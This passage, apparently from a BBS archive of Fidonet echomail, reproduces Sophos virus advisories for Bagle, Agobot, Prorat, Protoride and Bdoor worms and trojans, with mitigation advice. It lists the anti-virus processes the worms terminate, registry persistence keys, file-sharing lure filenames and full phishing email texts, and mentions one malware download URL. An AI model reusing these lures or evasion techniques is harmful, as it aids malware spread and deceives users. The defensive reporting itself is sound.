SPF.EXE
SPHINX.EXE
SPYXX.EXE
SS3EDIT.EXE
ST2.EXE
SUPFTRL.EXE
LUALL.EXE
SUPPORTER5.EXE
SYMPROXYSVC.EXE
SYSEDIT.EXE
TASKMON.EXE
TAUMON.EXE
TAUSCAN.EXE
TC.EXE
TCA.EXE
TCM.EXE
TDS2-98.EXE
TDS2-NT.EXE
TDS-3.EXE
TFAK5.EXE
TGBOB.EXE
TITANIN.EXE
TITANINXP.EXE
TRACERT.EXE
TRJSCAN.EXE
TRJSETUP.EXE
TROJANTRAP3.EXE
UNDOBOOT.EXE
VBCMSERV.EXE
VBCONS.EXE
VBUST.EXE
VBWIN9X.EXE
VBWINNTW.EXE
VCSETUP.EXE
VFSETUP.EXE
VIRUSMDPERSONALFIREWALL.EXE
VNLAN300.EXE
VNPC3000.EXE
VPC42.EXE
VPFW30S.EXE
VPTRAY.EXE
VSCENU6.02D30.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSISETUP.EXE
VSMAIN.EXE
VSMON.EXE
VSSTAT.EXE
VSWIN9XE.EXE
VSWINNTSE.EXE
VSWINPERSE.EXE
W32DSM89.EXE
W9X.EXE
WATCHDOG.EXE
WEBSCANX.EXE
CFIAUDIT.EXE
CFINET.EXE
ICSUPP95.EXE
MCUPDATE.EXE
CFINET32.EXE
CLEAN.EXE
CLEANER.EXE
LUINIT.EXE
MCAGENT.EXE
MCUPDATE.EXE
MFW2EN.EXE
MFWENG3.02D30.EXE
MGUI.EXE
MINILOG.EXE
MOOLIVE.EXE
MRFLUX.EXE
MSCONFIG.EXE
MSINFO32.EXE
MSSMMC32.EXE
MU0311AD.EXE
NAV80TRY.EXE
ZAUINST.EXE
ZONALM2601.EXE
ZONEALARM.EXE
A registry entry is added to the following key so that the program
directs.exe loads every time you logon to your computer:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
W32/Bagle-R makes multiple copies of itself into folders which are
likely to be part of a file-sharing network. The filenames used are:
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Serials.txt.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Opera 8 New!.exe
XXX hardcore images.exe
WinAmp 6 New!.exe
WinAmp 5 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
W32/Bagle-R infects programs on your PC by appending itself to existing
EXE files. The danger of W32/Bagle-R can be mitigated not only by
updating Sophos Anti-Virus but by blocking connections to TCP port 81
through your network firewall (this port is unlikely to be required for
any real services).
Blocking outbound port 81 connections stops computers on your network
from downloading the worm from outside. Blocking port 81 inbound means
that even if you do get infected you will not pass the virus on to
others.
You should also apply the latest Internet Explorer/Outlook Express
patches from Microsoft. The vulnerability used by W32/Bagle-R is
described in Microsoft Security Bulletin MS03-040 and is referred to as
the "Object Tag vulnerability in Popup Window".
W32/Agobot-ED
Aliases
Backdoor.Agobot.3.gen, W32/Gaobot.worm.gen.d
Type
Win32 worm
Detection
At the time of writing, Sophos has received just one report of this worm
from the wild.
Description
W32/Agobot-ED is a network worm which also allows unauthorised remote
access to the computer via IRC channels.
W32/Agobot-ED tries to copy itself to network shares with weak passwords.
W32/Agobot-ED copies itself to the Windows system folder as FILENAME.EXE
and creates entries in the registry at the following locations to run
itself on system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\
Run\Configuration Loader
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
Configuration Loader
The worm disables the shares C$, D$, ADMIN$ and IPC$.
W32/Agobot-ED attempts to terminate the following virus, anti-virus and
security processes:
tftpd.exe
dllhost.exe
winppr32.exe
mspatch.exe
penis32.exe
msblast.exe
ZONEALARM.EXE
WFINDV32.EXE
WEBSCANX.EXE
VSSTAT.EXE
VSHWIN32.EXE
VSECOMR.EXE
VSCAN40.EXE
VETTRAY.EXE
VET95.EXE
TDS2-NT.EXE
TDS2-98.EXE
TCA.EXE
TBSCAN.EXE
SWEEP95.EXE
SPHINX.EXE
SMC.EXE
SERV95.EXE
SCRSCAN.EXE
SCANPM.EXE
SCAN95.EXE
SCAN32.EXE
SAFEWEB.EXE
RESCUE.EXE
RAV7WIN.EXE
RAV7.EXE
PERSFW.EXE
PCFWALLICON.EXE
PCCWIN98.EXE
PAVW.EXE
PAVSCHED.EXE
PAVCL.EXE
PADMIN.EXE
OUTPOST.EXE
NVC95.EXE
NUPGRADE.EXE
NORMIST.EXE
NMAIN.EXE
NISUM.EXE
NAVWNT.EXE
NAVW32.EXE
NAVNT.EXE
NAVLU32.EXE
NAVAPW32.EXE
N32SCANW.EXE
MPFTRAY.EXE
MOOLIVE.EXE
LUALL.EXE
LOOKOUT.EXE
LOCKDOWN2000.EXE
JEDI.EXE
IOMON98.EXE
IFACE.EXE
ICSUPPNT.EXE
ICSUPP95.EXE
ICMON.EXE
ICLOADNT.EXE
ICLOAD95.EXE
IBMAVSP.EXE
IBMASN.EXE
IAMSERV.EXE
IAMAPP.EXE
FRW.EXE
FPROT.EXE
FP-WIN.EXE
FINDVIRU.EXE
F-STOPW.EXE
F-PROT95.EXE
F-PROT.EXE
F-AGNT95.EXE
ESPWATCH.EXE
ESAFE.EXE
ECENGINE.EXE
DVP95_0.EXE
DVP95.EXE
CLEANER3.EXE
CLEANER.EXE
CLAW95CF.EXE
CLAW95.EXE
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
BLACKICE.EXE
BLACKD.EXE
AVWUPD32.EXE
AVWIN95.EXE
AVSCHED32.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVKSERV.EXE
AVGCTRL.EXE
AVE32.EXE
AVCONSOL.EXE
AUTODOWN.EXE
APVXDWIN.EXE
ANTI-TROJAN.EXE
ACKWIN32.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
W32/Agobot-ED listens on a particular port and supplies a copy of the
worm in response to incoming connections.
Troj/Prorat-D
Aliases
Backdoor.Prorat.15
Type
Trojan
Detection
At the time of writing, Sophos has received just one report of this
Trojan from the wild.
Description
Troj/Prorat-D is a backdoor Trojan which may allow unauthorised access
and control of the computer from a remote network location.
Upon execution, Troj/Prorat-D drops copies of itself into the Windows
System or System32 folder using one or more of the filenames
FSERVICE.EXE, FFSERVICE.EXE, DSERVICE.EXE, LSERVICE.EXE, SSERVICE.EXE
and WSERVICE.EXE.
Troj/Prorat-D adds the following registry entries so that it is run on
startup:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Windows Reg Services = C:\\
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
Windows Reg Services = C:\\
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
Shell = Explorer.exe C:\\
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows Reg Services = C:\\
DirectX for Microsoft Windows = C:\\
HKLM\Software\Microsoft\Active Setup\Installed Components\
[A75aed00-d7bf-11d1-9947-00c0Cf98bbc9]\
StubPath = C:\\
HKLM\Software\Microsoft\Active Setup\Installed Components\
[5Y99AE78-58TT-11dW-BE53-Y67078979Y]\
StubPath = C:\\
This Trojan may also attempt to download and install the file
http://members.lycos.co.uk/kabloboy/XP_Update v1.5.3.exe.
This will be copied into the Windows folder under WINLOGON.EXE.
This program will drop the file WINKEY.DLL into the Windows System
folder and create the following registry entry:
HKCU\Software\Microsoft DirectX\WinSettings\
Troj/Prorat-C is embedded within WINKEY.DLL.
The downloaded file will also change the value in the [boot] and
[windows] sections of the files SYSTEM.INI and WIN.INI (respectively),
in the Windows folder by including the path to a copy of the original
file, e.g.
File : SYSTEM.INI
Section : boot
Parameter : shell
(New) Value : EXPLORER.EXE C:\\
File : WIN.INI
Section : windows
Parameter : run
(New) Value : C:\\
Troj/Prorat-D may also employ counter-removal tricks so that it becomes
difficult to terminate the Trojan process.
Furthermore the Trojan may monitor the registry entries above such that
the entries are restored immediately if changed.
W32/Protoride-F
Aliases
Worm.Win32.Protoride.f, W32/Protoride.worm, W32.Protoride.Worm
Type
Win32 worm
Detection
At the time of writing, Sophos has received just one report of this worm
from the wild.
Description
W32/Protoride-F is a Windows worm that spreads via network shares. The
worm also has a backdoor component that allows unauthorised remote
access to the computer via IRC channels.
W32/Protoride-F attempts to copy itself to the Windows system folder
with the filename rdpty.exe and then set the following registry entry so
as to run itself before all EXE files:
HKCR\exefile\shell\open\command
W32/Protoride-F attempts to copy itself to msupdate.exe in the startup
folder of shared network computers.
W32/Protoride-F may also set the following registry entry:
HKLM\Software\BeyonD inDustries\ProtoType[v2]
W32/Protoride-F remains resident, running in the background as a service
process and listening for commands from remote users via IRC channels.
W32/Bagle-N
Type
Win32 executable file virus
Detection
Sophos has received several reports of this virus from the wild.
Description
W32/Bagle-N is an email worm which sends itself via its own SMTP engine
to addresses harvested from your hard disk. The worm searches for files
with the extensions WAB, TXT, HTM, XML, DBX, MDX, EML, NCH, MMF, ODS,
CFG, ASP, PHP, PL, ADB, TBB and SHT.
When run the worm copies itself to the Windows system folder using the
name winupd.exe.
Note that W32/Bagle-N is also a parasitic virus which infects .EXE files
already present on your hard disk. If you run an infected program, then
the worm file will reappear, just as if you had opened an infected email
attachment. Be sure to replace or to disinfect files infected in this
way to prevent winupd.exe from reappearing. (See the Recovery section
below.)
W32/Bagle-N adds the value:
winupd.exe = [SYSTEM]\winupd.exe
to the registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This means that W32/Bagle-N runs every time you logon to your computer.
Emails have the following characteristics:
Subject lines:
E-mail account security warning.
Notify about using the e-mail account.
Warning about your e-mail account.
Important notify about your e-mail account.
Email account utilization warning.
E-mail technical support message.
E-mail technical support warning.
Email report
Important notify
Account notify
E-mail warning
Notify from e-mail technical support.
Notify about your e-mail account utilization.
E-mail account disabling warning.
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
Attached filenames:
Attach
Information
Details
Encrypted
first_part
Readme
Document
TextDocument
details
text_document
pub_document
MoreInfo
Message
Attached files arrive either as programs (with a .PIF extension) or as
password-protected archives (with a .ZIP or .RAR extension). The
password is included in the email.
A typical email sent by W32/Bagle-N
W32/Bagle-N opens up a backdoor and listens for connections. If it
receives the appropriate command it attempts to download and execute a
file. W32/Bagle-N also makes a web connection to a remote URL, thus
reporting the location and open port of infected computers.
W32/Bagle-N attempts to terminate several anti-virus and
security-related processes.
W32/Bagle-N searches the mapped drives for the folders containing the
string "shar" in the folder name. The worm copies itself to these
folders using the names:
ACDSee 9.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
Matrix 3 Revolution English Subtitles.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Opera 8 New!.exe
Porno Screensaver.scr
Porno pics arhive, xxx.exe
Porno, sex, oral, anal cool, awesome!!.exe
Serials.txt.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe
Curiously, the author of the worm has hidden an ASCII text
representation of a butterfly inside the viral code, alongside the
words:
The White Rabbit Presents
The first and the single
Anti-NetSky AntiVirus
Hidden inside the Bagle-N worm is a picture of a butterfly
Troj/Bdoor-CCK
Aliases
BackDoor-CCK
Type
Trojan
Detection
At the time of writing, Sophos has received just one report of this
Trojan from the wild.
Description
Troj/Bdoor-CCK is a backdoor Trojan. This program may drop the file
WMER.HTM into the Windows Help folder and also drop the file Trojan.INI
into the Windows folder.
Troj/Bdoor-CCK will also set the following registry entries so that it
runs on system restart:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
blss =
HKLM\Software\blss\installdate =
W32/Bagle-Zip
Aliases
Win32/Bagle.gen.zip
Type
Win32 worm
Detection
Sophos has received several reports of this worm from the wild.
Description
Sophos Anti-Virus detects as W32/Bagle-Zip the password-protected
archive files created by W32/Bagle-F, W32/Bagle-G, W32/Bagle-H,
W32/Bagle-I, W32/Bagle-J, W32/Bagle-K (ZIP archives), W32/Bagle-N and
W32/Bagle-O (ZIP and RAR archives).
W32/Bagle-O
Type
Win32 worm
Detection
Sophos has received several reports of this worm from the wild.
Description
W32/Bagle-O is an email worm which sends itself via its own SMTP engine
to addresses harvested from your hard disk. The worm searches for files
with the following extensions:
WAB, TXT, MSG, HTM, SHTM, STM, XML, DBX, MBX, MDX, EML, NCH, MMF, ODS,
CFG, ASP, PHP, PL, ADB, TBB, SHT, XLS, OFT, UIN, CGI, MHT, DHTM, JSP.
When run the worm copies itself to the Windows system folder using the
name winupd.exe.
Note that W32/Bagle-O is also a parasitic virus which infects EXE files
already present on your hard disk (infected files are detected as
W32/Bagle-N). If you run an infected program the worm file will
reappear, just as if you had opened an infected email attachment. Be
sure to replace or to disinfect files infected in this way to prevent
winupd.exe from reappearing. (See the Recovery section below.)
W32/Bagle-O adds the value:
winupd.exe = \winupd.exe
to the registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This means that W32/Bagle-O runs every time you logon to your computer.
W32/Bagle-O avoids email addresses containing the following:
sopho, {at}hotmail.com, {at}msn, {at}microsoft, anyone{at}, bugs{at}, contract{at}, feste,
gold-certs{at}, help{at}, info{at}, nobody{at}, noone{at}, rating{at}, kasp, admin,
icrosoft, support, ntivi, unix, bsd, linux, listserv, certific, samples,
{at}foo, {at}iana, free-av, {at}messagelab, winzip, google, winrar, abuse, panda,
cafee, spam, pgp, {at}avp., noreply, local, root{at}, postmaster{at}, f-secur
Emails have the following characteristics:
Subject lines:
E-mail account security warning.
Notify about using the e-mail account.
Warning about your e-mail account.
Important notify about your e-mail account.
Email account utilization warning.
E-mail technical support message.
E-mail technical support warning.
Email report
Important notify
Account notify
E-mail warning
Notify from e-mail technical support.
Notify about your e-mail account utilization.
E-mail account disabling warning.
Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document
Message texts (contructed from the following):
Dear user of ,
Dear user of e-mail server gateway,
Dear user of "" mailing server,
Dear user of "" mailing domain,
Dear user of "" domain,
Dear user of e-mail server "",
Hello user of e-mail server,
Dear user of "" mailing system,
Dear user, the management of mailing system
wants to let you know that,
Your e-mail account has been temporary disabled because of unauthorized
access.
Our main mailing server will be temporary unavaible for next two days,
to continue receiving mail in these days you have to configure our free
auto-forwarding service.
Your e-mail account will be disabled because of improper using in next
three days, if you are still wishing to use it, please, resign your
account information.
We warn you about some attacks on your e-mail account. Your computer may
contain viruses, in order to keep your computer and e-mail account safe,
please, follow the instructions.
Our antivirus software has detected a large ammount of viruses outgoing
from your email account, you may use our free anti-virus tool to clean
up your computer software.
Some of our clients complained about the spam (negative e-mail content)
outgoing from your e-mail account. Probably, you have been infected by a
proxy-relay trojan server. In order to keep your computer safe, follow
the instructions.
Read the attach.
Your file is attached.
More info in attach
See attach.
Follow the wabbit.
Find the white rabbit.
Please, have a look at the attached file.
See the attached file for details.
Message is in attach
Here is the file.
For more information see the attached file.
Further details can be obtained from attached file.
Advanced details can be found in attached file.
For details see the attach.
For details see the attached file.
For further details see the attach.
Please, read the attach for further details.
Pay attention on attached file.
The team
The Management,
Sincerely,
Best wishes,
Yours,
Have a good day,
Cheers,
Kind regards,
For security reasons attached file is password protected. The password
is ">
For security purposes the attached file is password protected. Password
-- ">
Note: Use password "> to open archive.
Attached file is protected with the password for security reasons.
Password is ">
In order to read the attach you have to use the following password:
">
Archive password: ">
Password - ">
Password: ">
Note, the email may have image files with extensions BMP, GIF or JPEG
which contain a password.
Attached filenames:
Attach
Information
Details
Encrypted
first_part
Readme
Document
Info
TextDocument
Text
details
text_document
pub_document
MoreInfo
Message
Note, the attached file arrives either as programs (with an EXE or a PIF
extension) or as password-protected archives (with a ZIP or RAR
extension). The password is included in the email.
A typical email sent by W32/Bagle-O
W32/Bagle-O opens port 2556 and listens for remote commands. If it
receives the appropriate command it attempts to download and execute a
file. W32/Bagle-O also makes a web connection to a remote URL, thus
reporting the location and open port of infected computers.
W32/Bagle-O attempts to terminate a wide range of anti-virus and
security related processes.
W32/Bagle-O searches the mapped drives for the folders containing the
string "shar" in the folder name. The worm copies itself to these
folders using the names:
ACDSee 9.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
Matrix 3 Revolution English Subtitles.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Opera 8 New!.exe
Porno Screensaver.scr
Porno pics arhive, xxx.exe
Porno, sex, oral, anal cool, awesome!!.exe
Serials.txt.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe
If run after 31 December 2005 the worm deletes the registry entries it
created when first run.
Curiously, the author of the worm has hidden an ASCII text
representation of a butterfly inside the virus code, alongside the
words:
The White Rabbit Presents
The first and the single
Anti-NetSky AntiVirus
Hidden inside the Bagle-O worm is a picture of a butterfly
W32/Bagle-J
Aliases
I-Worm.Bagle.i, W32/Bagle.j{at}MM, Win32/Bagle.J, W32.Beagle.J{at}mm,
WORM_BAGLE.J
Type
Win32 worm
Detection
Sophos has received many reports of this worm from the wild.
Description
NOTE: W32/Bagle-J sends itself as a password protected ZIP file that is
detected as W32/Bagle-Zip.
W32/Bagle-J is an email worm which sends itself via its own SMTP engine
to addresses harvested from your hard disk. The worm searches for files
with the extensions WAB, TXT, MSG, HTM, XML, DBX, MDX, EML, NCH, MMF,
ODS, CFG, ASP, PHP, PL, ADB, TBB, SHT, UIN and CGI.
The worm copies itself to the Windows system folder as IRUN4.EXE and
creates the file IRUN4.EXEOPEN (a copy of the worm in a password
protected ZIP format) in the same folder.
W32/Bagle-J adds the value:
ssate.exe = \irun4.exe
to the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This means that W32/Bagle-J runs every time you logon to your computer.
Emails have the following characteristics:
Subject lines:
E-mail account security warning.
Notify about using the e-mail account.
Warning about your e-mail account.
Important notify about your e-mail account.
Email account utilization warning.
Notify about your e-mail account utilization.
E-mail account disabling warning.
Message texts (constructed from a choice of the following):
"Dear user of ,"
"Dear user of gateway e-mail server,"
"Dear user of e-mail server "<domain name>","
"Hello user of e-mail server,"
"Dear user of "" mailing system,"
"Dear user, the management of mailing system wants to let
you know that,"
and
"Your e-mail account has been temporary disabled because of unauthorized
access."
"Our main mailing server will be temporary unavaible for next two days,
to continue receiving mail in these days you have to configure our free
auto-forwarding service."
"Your e-mail account will be disabled because of improper using in next
three days, if you are still wishing to use it, please, resign your
account information."
"We warn you about some attacks on your e-mail account. Your computer may
contain viruses, in order to keep your computer and e-mail account safe,
please, follow the instructions."
"Our antivirus software has detected a large ammount of viruses outgoing
from your email account, you may use our free anti-virus tool to clean up
your computer software."
"Some of our clients complained about the spam (negative e-mail content)
outgoing from your e-mail account. Probably, you have been infected by
a proxy-relay trojan server. In order to keep your computer safe,
follow the instructions."
and
"For more information see the attached file."
"Further details can be obtained from attached file."
"Advanced details can be found in attached file."
"For details see the attach."
"For details see the attached file."
"For further details see the attach."
"Please, read the attach for further details."
"Pay attention on attached file."
and
"For security reasons attached file is password protected. The password
is ""."
"For security purposes the attached file is password protected. Password
is ""."
"Attached file protected with the password for security reasons.
Password is ."
"In order to read the attach you have to use the following password:
."
and
"Sincerely,"
"Best wishes,"
"Have a good day,"
"Cheers,"
"Kind regards,"
"The Management,"
and
"The team, "" target="new">http://www."
Attached file (a password protected ZIP archive):
Attach
Information
Readme
Document
TextDocument
TextFile
MoreInfo
Message
W32/Bagle-J opens up a backdoor on port 2745 and listens for connections.
If it receives the appropriate command it attempts to download and
execute a file. W32/Bagle-J also makes a web connection to a remote URL,
thus reporting the location and open port of infected computers.
W32/Bagle-J attempts to terminate several Anti-Virus and security
related processes:
ATUPDATER.EXE
AVWUPD32.EXE
AVPUPD.EXE
LUALL.EXE
DRWEBUPW.EXE
ICSSUPPNT.EXE
ICSUPP95.EXE
UPDATE.EXE
NUPGRADE.EXE
ATUPDATER.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AVXQUAR.EXE
CFIAUDIT.EXE
MCUPDATE.EXE
NUPGRADE.EXE
OUTPOST.EXE
AVLTMAIN.EXE
W32/Bagle-J searches the mapped drives for folders containing the string
"shar" in the folder name. If such a folder is found, the worm copies
itself to the folder using the following filenames:
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Porno Screensaver.scr
Porno, sex, oral, anal cool, awesome!!.exe
Porno pics arhive, xxx.exe
Serials.txt.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe
Opera 8 New!.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Matrix 3 Revolution English Subtitles.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
ACDSee 9.exe
If the date is after 25 April 2005, W32/Bagle-J terminates itself and
deletes all the registry entries it created when it first ran.
Hidden inside the Bagle-J worm's code is the following text, which is
never displayed:
Hey,NetSky, fuck off you bitch, don't ruine our bussiness, wanna start a
war?
--- MultiMail/Win32 v0.43
* Origin: Try Our Web Based QWK: DOCSPLACE.ORG (1:123/140)SEEN-BY: 633/267 270 @PATH: 123/140 500 106/2000 633/267 |
|
| SOURCE: echomail via fidonet.ozzmosis.com | |
Email questions or comments to sysop@ipingthereforeiam.com
All parts of this website painstakingly hand-crafted in the U.S.A.!
IPTIA BBS/MUD/Terminal/Game Server List, © 2025 IPTIA Consulting™.